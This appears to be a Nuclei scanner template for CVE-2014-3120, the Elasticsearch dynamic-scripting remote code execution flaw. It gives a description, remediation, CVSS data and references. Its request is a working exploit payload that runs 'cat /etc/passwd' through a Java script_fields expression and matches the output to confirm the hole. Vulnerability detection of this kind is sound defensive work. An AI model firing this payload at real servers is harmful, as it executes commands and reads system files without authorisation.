id: CVE-2014-3120 info: name: ElasticSearch v1.1.1/1.2 RCE author: pikpikcu severity: medium description: | The default configuration in Elasticsearch before 1.2 enables dynamic scripting, which allows remote attackers to execute arbitrary MVEL expressions and Java code via the source parameter to _search. Be aware this only violates the vendor's intended security policy if the user does not run Elasticsearch in its own independent virtual machine. remediation: | Upgrade to a patched version of ElasticSearch reference: - https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2014-3120 - https://www.elastic.co/blog/logstash-1-4-3-released - https://nvd.nist.gov/vuln/detail/CVE-2014-3120 - http://bouk.co/blog/elasticsearch-rce/ - https://www.elastic.co/community/security/ classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2014-3120 cwe-id: CWE-284 epss-score: 0.55248 epss-percentile: 0.97313 cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: elasticsearch product: elasticsearch tags: rce,elasticsearch,kev,vulhub,cve,cve2014,elastic http: - raw: - | POST /_search?pretty HTTP/1.1 Host: {{Hostname}} Accept: */* Accept-Language: en Content-Type: application/x-www-form-urlencoded { "size": 1, "query": { "filtered": { "query": { "match_all": { } } } }, "script_fields": { "command": { "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"cat /etc/passwd\").getInputStream()).useDelimiter(\"\\\\A\").next();" } } } matchers-condition: and matchers: - type: word part: header words: - "application/json" - type: regex part: body regex: - "root:.*:0:0:" - type: status status: - 200 # digest: 4a0a0047304502202347dcb14a6804ecb2e934e7780c015878fc2eed01f61cf6c9839dbebb063d280221008a5a8d5cebe213d3f4468fa5c4f66e2fe6fb8e42b046bbc25b4282a231586994:922c64590222798bb761d5b6d8e72950